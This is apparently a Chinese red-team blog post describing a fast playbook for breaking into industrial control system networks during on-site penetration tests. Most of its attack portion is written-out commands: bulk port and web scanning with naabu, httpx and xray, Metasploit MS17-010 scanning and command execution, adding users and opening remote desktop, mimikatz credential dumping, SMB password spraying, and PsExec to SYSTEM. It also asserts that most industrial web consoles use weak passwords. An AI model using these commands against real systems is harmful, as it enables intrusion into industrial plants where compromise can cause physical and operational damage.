针对于成百上千的工控内网如何精准快速的找到突破口？

大家好，这里是 渗透攻击红队 的第 65 篇文章，本公众号会记录一些红队攻击的案例，不定时更新

前言

最近这几个月一直在打工控系统，什么现场操作站，生产车间 ，什么什么终端 ... 对于这几个月自己总结了一套打工控的经验，如何在一个 C 段 B段中快速信息搜集、快速拿到主机权限、如何快速在一个 C 段或者 B 段中探测出全部 Web ？然后针对这些 Web 服务的网站自动化扫描漏洞？基本上一个 C 段全部搞完顶多一个小时就可以提交报告了！

如何批量对一个 C 段扫描 web漏洞、快速拿到权限

针对于 Web 如何批量进行漏洞扫描

一般来说这种项目都会在现场给你接入网线直接进内网，所以我们做内网渗透也很方便。

对于 Web 的信息搜集，我一般会用 Inscan、Fscan 先快速过一遍当前 C 段有哪些主机存活：（一般 5 分钟时间一个 C段就能扫完 ）

知道当前 C 段有 Web 后，直接上自动化扫描工具扫描：（由于我是 Mac OS ，下面这些工具大家装个 Ubantu 或者 Kali 也能用）

# 吧一个 C 段转换成 IP
mapcidr -l input/target.txt -silent > input/cidr.txt

# 如果扫描 top 1000 端口就是：
naabu -iL input/cidr.txt  -rate 10000 -top-ports 1000 | tee output/active_ports.txt

# 如果要扫描全端口就是：
naabu -iL input/cidr.txt  -rate 10000 -p - | tee output/active_ports.txt

# 调用 httpx 扫描 web 并输出
httpx -l output/active_ports.txt -title | tee output/active_title_urls.txt
httpx -l output/active_ports.txt | tee output/active_urls.txt

# 调用 xray 批量扫描漏洞并输出到文件里
set +e ;for i in $(cat output/active_urls.txt ); do ./xray webscan --basic-crawler $i --html-output output/`date +%Y%m%d%H%M%S`.html;done
cat output/*.html >> output/xray.html

等待几分钟 Xray 就可以扫描出全部漏洞：

一共弄完也差不多10分钟，然后对于 Web 的就可以直接写报告了！

其实这些工控的 Web 全都是弱口令，10 台最起码有 8 台都是弱口令，大家打工控的时候可以试试，一试一个准！

针对于系统如何批量拿到权限

一般像这种工控的，基本上 90% 的系统都是 Windows 7、Windows 2008、Windows 2003、Windows XP，永恒之蓝、0708 多的很！直接 Metasploit 一把梭哈就行，参考文章：基于 Metasploit 如何快速在内网拿到其他跳板机

msf6 > services -d
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > set rhosts file:/root/ip.txt
msf6 > set threads 16
msf6 > run

一般使用 17010 打的目标大部分都是 x64 位的，而工控很多机器都是 x32 位的，所以我们不能使用 exploit 利用模块打。

exploit/windows/smb/ms17_010_eternalblue 这个模块的 Payload 只有 x64 的，所以你是打不成功的！我们只能用 Metasploit 用执行命令的模块：

use auxiliary/admin/smb/ms17_010_command
set rhost xxxx
set command whoami
run

然后使用执行命令模块去添加用户开3389直接登陆远程桌面即可！如果目标是 Win 7 系统，还可以在本地起一个 http 服务，直接 Pooshell 直接远程抓密码，以后有机会再写！

然后通过拿到当前机器的远程桌面，然后上传 mimikatz 直接抓明文，去横向喷射即可：

msf6 >use auxiliary/scanner/smb/smb_login
msf6 >set RHOSTS file:/ip.txt
msf6 >set smbuser administrator
msf6 >set smbdomain .
msf6 >set pass_file /root/passwords.txt
msf6 >set threads 15
msf6 >set blank_passwords true
msf6 >set bruteforce_speed 3
msf6 >run
msf6 >creds

然后通过喷射成功的机器直接通过 Psexec 直接拿到 SYSTEM：

其实都是一些内网渗透最基础的操作而已，只不过由于项目时间问题，我们需要快速的去针对性的打，一般低危漏洞都不要去搞了，太浪费时间！好了，兄弟们在打工控的时候不妨试试我的方法，祝大家好运！